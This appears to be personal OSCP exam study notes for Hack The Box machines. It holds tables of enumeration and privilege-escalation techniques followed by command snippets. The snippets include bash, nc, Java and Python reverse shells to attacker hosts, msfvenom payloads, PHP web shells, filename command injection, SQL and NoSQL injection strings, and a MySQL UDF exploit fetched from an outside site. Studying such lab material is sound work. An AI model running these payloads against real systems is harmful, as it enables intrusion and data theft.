Forest, Active, Cascade, Monteverde, Reel, Mantis, Blackfield, Search, APT, Support, Outdated, Scrambled, StreamIO, Rebound, Manager
https://twitter.com/hackthebox_eu/status/1529122562038456320?cxt=HHwWgICzhcu3xLgqAAAA
https://github.com/tedchen0001/OSCP-Notes/blob/master/AD.md
| Machine | Enumeration | Privilege Escalation |
|---|---|---|
| Admirer | web dir enum, Adminer MySQL(local) | sudo list SETENV, Hijacking Python Library PYTHONPATH |
| Armageddon | Drupal (CVE-2018-7600), credential in config file, MySQL | sudo list, snap |
| Backdoor | wordpress LFI proc gdbserver | screen |
| *BackendTwo | API scanning, create user, analysis and modify code, auth.log | sudo list, so file |
| Blocky | dirb javadecompilers wordpress | sudo list |
| Blunder | feroxbuster extensions txt bludit |
sudo versions before 1.8.28 |
| Brainfuck | wordpress plugin smtp pop3 | Cryptography |
| Cronos | subdomain wfuzz | crontab |
| Doctor | ssti-payloads | Splunk |
| Forge | SSRF subdomain ftp | sudo list Python Debugger pdb |
| Forlic | playsms Ook! | BOF |
| Haircut | dirb medium.txt writeable uploads folder | Unknown SUID binary screen |
| Horizontall | wfuzz top1million-110000 strapi | active port 8000 local CVE ssh tunnel |
| Irked | irc-unrealircd-backdoor | LinPEAS Unknown SUID binary |
| *Jarvis | SQLi phpmyadmin 4.8 RCE | python command injection & systemctl binary |
| Knife | firefox wappalyzer PHP 8.1.0 | upgrade shell & sudo list |
| Lame | distccd | nmap |
| *Luanne | nmap Supervisor & robots.txt weather | BSD doas & netpgp backup file |
| Magic | SQLi bypassing login & File upload bypass PHP getimagesize() |
mysqldump & Unknown SUID binary sysinfo |
| *Mango | certificate subdomains & enumerate credentials of nosql-injection (*Not sure if you can use this script in the exam), reuse |
jjs, write root SSH public key |
| Meta | subdomain, Exiftool, python3 reverse, process, mogrify(ImageMagick) | sudo list, env_keep, Neofetch |
| Mirai | nmap, pi.hole, ssh | sudo list, mount, strings |
| MonitorsTwo | Cacti, #InfoLeakScript, MySQL, SSH | Docker, CVE-2021-41091 |
| Networked | File upload bypass PHP getimagesize(), php command injection |
*sudo list |
| Nibbles | page source, directory | sudo list |
| *NineVeh | brute force attack http & https, phpLiteAdmin | crontab, chkrootkit |
| Noter | Flask cookie (flask-unsign), ftp credentials, md-to-pdf package, CVE-2021-23639 | MySQL UDF |
| OpenAdmin | OpenNetAdmin, pwd in conf file & reverse proxy, cracking passphrase |
sudo list, GTFO |
| OpenSource | Flask debugger PIN, Gitea, .git hide information |
process git commit |
| *Ophiuchi | Java-Deserialization, SnakeYAML | sudo list, analysis of GO code |
| Passage | CutePHP & password storage location & base64 & cracking |
*SUID dbus |
| *Pit | SNMP enum, hide web folder, SeedDMS | NET-SNMP-EXTEND-MIB, monitoring |
| *Poison | LFI, FreeBSD Apache log poisoning | password base64, vncviewer |
| Popcorn | torrent, upload bypass | user cache, motd, Linux PAM |
| Postman | Redis, ssh, john | Webmin |
| Precious | pdfkit, ruby, plain text password | sudo list, *YAML Deserialization |
| Previse | HTTP 302, PHP exec, mysql, hashcat 500 | sudo list, $PATH variable |
| Ready | gitlab | *Escaping Docker (mounting-disk-poc2), SSH |
| *RedPanda | SSTI payload($→*, selection expressions), msfvenom (wget) | jar (pspy process), XML, XXE, SSH |
| ScriptKiddie | *APK(No need for msfvenom but be careful choosing payload), shell script, command injection (cut) |
sudo list |
| Seal | manager, *403 Fuzz, 401, credential in commit history, opt, symbolic link, ssh |
sudo list |
| Sense | feroxbuster extensions txt medium.txt, pfsense RCE |
no need |
| *Shared | Cookie-based SQL Injection, user table, SSH, IPython CVE-2022-21699 | Redis |
| Shibboleth | wfuzz, udp, IPMI, hashcat 7300, zabbix RCE, password reuse |
MariaDB |
| Shocker | ShellShock, 403 permission directory, extensions sh pl |
sudo list |
| Shoppy | NoSQL injection, subdomain(bitquark list), SSH | sudo list, cat and analysis script, docker group |
| SneakyMailer | subdomain(wfuzz), *credential phishing(email, nc), ftp, *PyPI malicious package |
sudo list |
| SolidState | Apache James 2.3.2, *reset user password, POP3, trigger by ssh login |
task, file permission |
| Squashed | nfs, mount permission, change userid, web folder | MIT-magic-cookie-1, Xauthority |
| Sunday | finger enum users, SSH, backup folder, hashcat 7400 | sudo list (wget) |
| SwagShop | Magento CVE-2015-1397 | sudo list (vi) |
| Tabby | LFI, tomcat-users.xml, page source, remote deploy, file password |
lxd |
| TartarSauce | web dir enum, wordpress plugins, CVE-2015-8351 (plugin real version), sudo list (tar) |
*backuperer.service (System timers) |
| Time | *Jackson (CVE-2019-12384), Java-Deserialization | timer_backup.service (System timers) |
| Traverxec | Nostromo, HOMEDIRS (www_public), hidden folder in user's folder, cracking passphrase (e.g., OpenAdmin box) | /etc/sudoers, journalctl without PIPE, resize (e.g., less, vi) |
| Trick | reverse DNS lookup, another subdomain, SQLi default Nginx sites-available configuration file, LFI, SSH key |
fail2ban (group permission) |
| UpDown | *web dir enum, .git directory, subdomain, .htaccess(Required-Header), proc_open (PHP), PHP phar, python inject commands |
sudo list |
| Valentine | web dir enum, Heartbleed poc, decrypt RSA private key | tmux |
| *Writer | web dir enum, SQL injection LOAD_FILE with LFI list, Python source code analysis (__init__.py), Django hash |
postfix(disclaimer), apt-get update process |
(*):review before the exam
| Machine | Enumeration | Privilege Escalation | AD |
|---|---|---|---|
| Active | Groups.xml | Kerberoasting | ✅ |
| *APT | MS-RPC port 135, IOXID resolver, IPv6, share file, AD database file, dump hashes, valid usernames, modify registry |
responder, NTLMv1 Hash | ✅ |
| Arctic | Adobe ColdFusion 8 | MS10-059(wait for the exploit to take effect) | |
| Atom | smb pdf, unzip exe file, autoUpdater, Electron-Updater, YAML | PortableKanban | |
| *Bankrobber | XSS, SQLi, Arbitrary File Read | forwarding service, BOF | |
| Bastard | Drupal 7 CVE-2018-7600 | MS10-059, MS15-051 | |
| Bastion | mount vhd, SYSTEM SAM user hash | mRemoteNG | |
| Blue | MS17-010 | no need | |
| Bounty | File upload bypass, web.config | SeImpersonatePrivilege | |
| Buff | |||
| Cascade | ldap hidden information, smb share, VNC password, user share DB file | AD Recycle Bin | ✅ |
| Chatterbox | Achat | AutoLogon credentials, reuse password, powershell reverse (with credential) | |
| Conceal | SNMP, *IPsec VPN, FTP (IIS folder), Classic ASP | SeImpersonatePrivilege | |
| Devel | FTP, IIS folder | SeImpersonatePrivilege | |
| Forest | |||
| Fuse | username(from website), create password(cewl --with-numbers), smbpasswd, enumprinters(rpcclient) | SeLoadDriverPrivilege, zerologon | ✅ |
| Grandpa | Windows Server 2003, IIS WebDAV CVE-2017-7269 | WMI Service Isolation Privilege Escalation (churrasco) | |
| Granny | Windows Server 2003, IIS WebDAV CVE-2017-7269 | WMI Service Isolation Privilege Escalation (churrasco) | |
| *Intelligence | username(pdf creator), add AD Integrated DNS records | group ReadGMSAPassword | ✅ |
| Jerry | Tomcat default credential, deploy | no need | |
| Legacy | MS08-067, MS17-010 | no need | |
| Love | SSRF Gopher MySQL | AlwaysInstallElevated | |
| Object | |||
| Omni | IoT exploit | *SAM SYSTEM hash, Export-Clixml, GetNetworkCredential | |
| Optimum | HttpFileServer 2.3 | MS16-098 | |
| Outdated | CVE-2022-30190 (pdf), AddKeyCredentialLink, (bloodhound, Evil-WinRM) |
WSUS | ✅ |
| Reel | sendemail, RTF, HTA | ||
| Remote | NFS Service(default port 2049), mount, sdf, Umbraco CMS | SeImpersonatePrivilege, TeamViewer | |
| *Resolute | RPC enumeration, password spray, hidden folder, scripts | DNSAdmins | ✅ |
| *Scrambled | website leak information (user and password), Ticket, SPN, ticketer.py (500 Administrator), sql query user info, xp_cmdshell, PowerShell run as different user |
dll (.NET Decompiler), .NET object deserialization | ✅ |
| *Search | enumrate username(website image leaks info), kerberoast, unzip xlsx | pfx, web dir, GMSA user, GenericAll | ✅ |
| SecNotes | CSRF reset password link, smb, IIS php | WinPEAS Linux shells/distributions | |
| Servmon | FTP, NVMS LFI, SSH | NSClient, *SSH tunnel (localhost services) | |
| Silo | Oracle (default port 1521), CVE-2012-1675, ODAT, brute-force | Oracle, SYSTEM Privilege | |
| *StreamIO | subdomain, SQLi, wfuzz(parameter, cookie), LFI(php://filter), page uses eval | forwarding service, SQL Server 1433, firefox credentials, bloodhound analysis, Add-DomainObjectAcl(add member to group), ReadLAPSPassword |
✅ |
| Support | disassemble(.Net), LDAP, user information | DACL abuse, GenericAll | ✅ |
| Worker | SVN(default port 3690), revision, Azure DevOps, new branch, additional drives, evil-winrm |
Azure DevOps, PowerShell task |
(*):review before the exam
Used in Admirer
sudo PYTHONPATH=/tmp/ <full path of a script file>
Used in Knife for upgrade shell
/bin/bash -c '/bin/bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1'
Used in Luanne
authenticate
curl -s http://127.0.0.1:3001/<folder>/ -u <user>:<password>
find the open ports
netstat -punta || ss -nltpu || netstat -anv
Used in Magic
image file upload bypass
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' file.jpg
dump mysql database data without using mysql client tool
mysqldump -u root -p database_name > database_name.sql
Used in Mango
nosql-injection: basic authentication bypass
# change post data
username[$ne]=toto&password[$ne]=toto
username[$regex]=.*&password[$regex]=.*
username[$exists]=true&password[$exists]=true
Used in Mirai
# check partition
strings /dev/sdb
Used in Networked
command injection
# method1: vaild file name
echo "" > "; nc -c bash 192.168.0.1 4444 ;"
# method2: use base64 encoding format to avoid file name checking
echo nc -e /bin/bash 192.168.0.1 4444 | base64 -w0
echo "" > "a; echo bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMC4xIDQ0NDQK | base64 -d | sh; b"
-w, --wrap=COLS
Wrap encoded lines after COLS character (default 76). Use 0 to disable line wrapping.
-d, --decode
Decode data.
-i, --ignore-garbage
When decoding, ignore non-alphabet characters.
--help
display this help and exit
--version
output version information and exit
Used in Nineveh
# check information in image file
strings -n 20 <image file>
# extract known file types
binwalk <image file>
binwalk -e <image file>
Used in OpenAdmin
find files containing specific text e.g. password
find / -type f \( -iname \*.php -o -iname \*.config -o -iname \*.conf -o -iname \*.ini -o -iname \*.txt \) -exec grep -i 'password\|passwd' {} \; -print 2>&-
crack SSH private key passphrase
ssh2john id_rsa > id_rsa.hash
john id_rsa.hash -wordlist=rockyou.txt
Used in Ophiuchi
one line reverse shell command in Java
String[] cmdline = { "sh", "-c", "echo 'bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1' > /tmp/revshell.sh && chmod 777 /tmp/revshell.sh && bash /tmp/revshell.sh" };
Runtime.getRuntime().exec(cmdline);Used in Pit
# crack SNMP passwords
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt -p <target port> <target ip>
snmpwalk -v1 -c public <target ip> .
# -v 1|2c|3 SNMP version
# -c community string, like a password
# . [OID]
get file access control lists
getfacl /usr/local/monitoring
Used in Tabby
# create reverse shell
msfvenom -p java/shell_reverse_tcp lhost=<attacker ip> lport=<attacker port> -f war -o shell.war
# Tomcat role admin, manager and manager-script can remote deploy
curl -v -u 'tomcat:<password>' --upload-file shell.war "http://<target ip>:<port>/manager/text/deploy?path=/test&update=true"
# trigger
curl http://<target ip>:<port>/test/
# crack zip file password
zip2john <file> > hash
john --wordlist=<password_list> hash Used in TartarSauce
wpscan --url http://<target ip>/ -e ap --plugins-detection aggressive --api-token <api_key> -t 20 --verbose
# --api-token:display vulnerability data (not always necessary), register a uesr and get the api key from wpscan offical websiteUsed in Time
# privilege escalation by using task script
echo 'cp /bin/sh /tmp/sh;chmod u+s /tmp/sh' > <task script file>
# execute
/tmp/sh -p
# -p priviligedUsed in Valentine
# check heartbleed vulnerability with Nmap NSE script
nmap --script=ssl-heartbleed -p <target port> <target ip>ssh-rsa turned off by default
# sign_and_send_pubkey: no mutual signature supported
ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedKeyTypes=+ssh-rsa <user>@<target ip> -i <private_key># hijacking tmux sessions for Privilege Escalation
/usr/bin/tmux -S /.devs/dev_sessUsed in APT
port 135 MSRPC
# mappings of RPC
python3 rpcdump.py <target ip> -p 135
# enumerating network interface, Windows DCOM version 5.6
python3 IOXIDResolver.py <target ip>
# Nmap IPv6 scan
nmap -6 -p- --min-rate 1000 <target IPv6 address>
# enumerating information from Samba systems
python3 enum4linux-ng.py -A -C <target IPv6 address>
# list all files from all readable shares
crackmapexec smb <target IPv6 address> -u '' -p '' -M spider_plusUsed in Bankrobber
/* load file */
x' UNION SELECT 1, LOAD_FILE('C:\Windows\System32\drivers\etc\hosts'),3-- - Used in Bastion
sudo mkdir /mnt/bastion
sudo mount -t cifs -o username=NULL //<target ip>/Backups/WindowsImageBackup /mnt/bastion -o rw
mkdir /tmp/vhd
guestmount --add "/mnt/bastion/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd" --inspector --ro /tmp/vhd -v
cd /tmp/vhd/Windows/System32/config/
# using two file SYSTEM and SAM to dump the hashes
samdump2 SYSTEM SAM > /tmp/hashes.txt
# If the hashes exported by samdump2 seem unusual
python3 secretsdump.py -system SYSTEM -sam SAM LOCAL
# crack user password hash
hashcat -m 1000 user_hash.txt <password_list.txt>Used in Chatterbox
REM create payload
msfvenom -p windows/shell_reverse_tcp lhost=<attacker ip> lport=<attacker listening port> -f exe > rev.exe
REM change user, password and payload
powershell -c "$password = ConvertTo-SecureString '<password>' -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential('<user>', $password);Start-Process -FilePath "<payload>" -Credential $creds"Used in Conceal
sudo ipsec restart
Used in Grandpa
churrasco.exe "nc.exe -e cmd.exe <attacker ip> <attacker port>"
Used in Jerry
https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown
Used in Legacy
https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067.py
attacker
# Windows XP SP3 English (NX) = 6
python2 ms08-067.py <target ip> 6 <target port>
python2 smbserver.py <shareName> /usr/share/windows-resources/binaries/target
copy \\<attacker ip>\<shareName>\whoami.exe C:\windows\tempUsed in Love
SSRF payload
https://github.com/tarunkant/Gopherus
select '<?php system($_GET[\'cmd\']); ?>' INTO OUTFILE 'C:\\xampp\\htdocs\\omrs\\admin\\test.php';msfvenom -p windows/x64/shell/reverse_tcp LHOST=<attacker ip> LPORT=<attacker port> -f msi -o reverse.msimsiexec /quiet /qn /i <payload>Used in Omni
python SirepRAT.py <target ip> LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c Powershell Invoke-WebRequest -OutFile C:\Data\Users\DefaultAccount\Documents\nc64.exe -Uri http://<attacker ip>/nc64.exe "
Used in Remote
NFS Service
showmount -e <target ip>
mkdir /tmp/test_folder
sudo mount -t nfs <target ip>:/<folder> /tmp/test_folder -o nolockUsed in Silo
ODAT(Oracle Database Attacking Tool)
# searching valid SIDs
python3 odat.py sidguesser -s <target ip> --sids-file=./resources/sids.txt
# using default list (accounts/accounts.txt) to execute brute-force attacks
python3 odat.py passwordguesser -s <target ip> -d <sid> -vvv
# upload reverse shell payload
python3 odat.py utlfile -s <target ip> -p <target port> -U <username> -P <password> -d <sid> --sysdba --putFile c:/ shell-x64.exe /tmp/shell-x64.exe
# execute reverse shell payload
python3 odat.py externaltable -s <target ip> -p <target port> -U <username> -P <password> -d <sid> --sysdba --exec c:/ shell-x64.exeUsed in Scrambled
python3 getTGT.py scrm.local/ksimpson:ksimpson -k -dc-ip 10.10.11.168
export KRB5CCNAME=ksimpson.ccache
klist
python3 GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-ip 10.10.11.168 -dc-host dc1.scrm.local -k -request
# -k Use Kerberos authentication host machine
.\hashcat.exe -m 13100 .\hash .\rockyou.txtUsed in StreamIO
/* testing, the order of the movie list is different */
';--
/* check version */
' UNION SELECT 1, SELECT @@VERSION), 3, '4', '5', '6';--
/* show all databases, version >= SQL Server 2017 */
' UNION SELECT 1, (SELECT STRING_AGG(name, ',') FROM sys.sysdatabases), 3, '4', '5', '6' ;--
/* show all databases, version < SQL Server 2017 */
' UNION SELECT 1,(STUFF((SELECT ',' + name FROM sys.sysdatabases FOR XML PATH('')), 1, 1, '')), 3, '4', '5', '6';--
/* show all tables */
' UNION SELECT 1, (SELECT STRING_AGG(TABLE_NAME, ',') FROM STREAMIO.INFORMATION_SCHEMA.TABLES), 3, '4', '5', '6';--
/* show all columns */
' UNION SELECT 1, (SELECT STRING_AGG(COLUMN_NAME, ',') FROM STREAMIO.INFORMATION_SCHEMA.COLUMNS), 3, '4', '5', '6';--
/* get the usernames and passwords */
' UNION SELECT 1, (SELECT STRING_AGG(username, ',') + STRING_AGG(password, ',') FROM STREAMIO.dbo.users), 3, '4', '5', '6';--
find parameter
wfuzz -H 'Cookie: PHPSESSID=<PHPSESSID>' -u https://streamio.htb/admin/?FUZZ= -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hw <value>
Used in Trick
dig axfr @<target ip> <domain>
Used in Shoppy
NoSQL injection payload
/home/jaeger/ShoppyApp/index.jsadmin' || '1==1
DNS list
wfuzz -H 'Host: FUZZ.shoppy.htb' -u http://shoppy.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --hw 11
Used in Writer
wfuzz -z file,/tmp/file_inclusion_linux.txt -d "uname=admin' union select 1,LOAD_FILE('FUZZ'),3,4,5,6; -- -&password=1234" --hw 89 http://writer.htb/administrative
Used in Noter
# cannot import name 'json' from 'itsdangerous'
pip install Flask==2.0.1# If the generated cookie does not work, note the system time in the VM.
# decode cookie
flask-unsign --decode --cookie "<cookie>"
# brute forcing secret key
flask-unsign --unsign --cookie "<cookie>" --wordlist ~/Documents/rockyou.txt --no-literal-eval
# create session
flask-unsign --sign --cookie "{'logged_in': True, 'username': '<username>'}" --secret <keystring>MySQL UDF
# attacker pc
wget http://0xdeadbeef.info/exploits/raptor_udf2.c
# target host
cd /tmp
wget http://<attacker ip>:<attacker port>/raptor_udf2.c
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
mysql -u root -p
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
# show plugin folder path
show variables like '%plugin%';
# change plugin path
# e.g., select * from foo into dumpfile "/usr/lib/x86_64-linux-gnu/mariadb19/plugin/raptor_udf2.so";
select * from foo into dumpfile "<plugin folder path>/raptor_udf2.so";
create function do_system returns integer soname 'raptor_udf2.so';
# check loading
select * from mysql.func;
# chagne reverse shell command
select do_system('echo ''/bin/bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1'' > /tmp/revshell.sh && chmod 777 /tmp/revshell.sh && /bin/bash /tmp/revshell.sh');Used in Armageddon
# In web shell (non-tty-shell) we need to run a single query from the command line.
mysql -u "<username>" -h "localhost" "<passowrd>" "<database>" -e "<sql command>"Used in BackendTwo
for API testing
https://github.com/assetnote/kiterunner
./kr scan http://<target ip>/api/ -w ~/Documents/routes-large.kite -x 20
curl -X POST -v 'http://10.10.11.162/api/v1/user/signup' --header 'content-type: application/json' -d '{"email":"[email protected]","password":"1234"}' | jq .
curl -X POST -v 'http://10.10.11.162/api/v1/user/login' -d '[email protected]&password=1234'- SSRF
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
http://0000::1:80/
Used in Precious
YAML Deserialization
https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/
Used in Search
crackpkcs12 -d ~/Documents/rockyou.txt staff.pfx
Used in Meta
#!/usr/bin/python3
from os import dup2
from subprocess import run
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.14", 4444))
dup2(s.fileno(), 0)
dup2(s.fileno(), 1)
dup2(s.fileno(), 2)
run(["/bin/bash", "-i"])Used in Zipping
(It's not a necessity, but we can still learn about new concepts.)
ln -s ../../../../../../../etc/passwd test.pdf
zip --symlinks test.zip test.pdf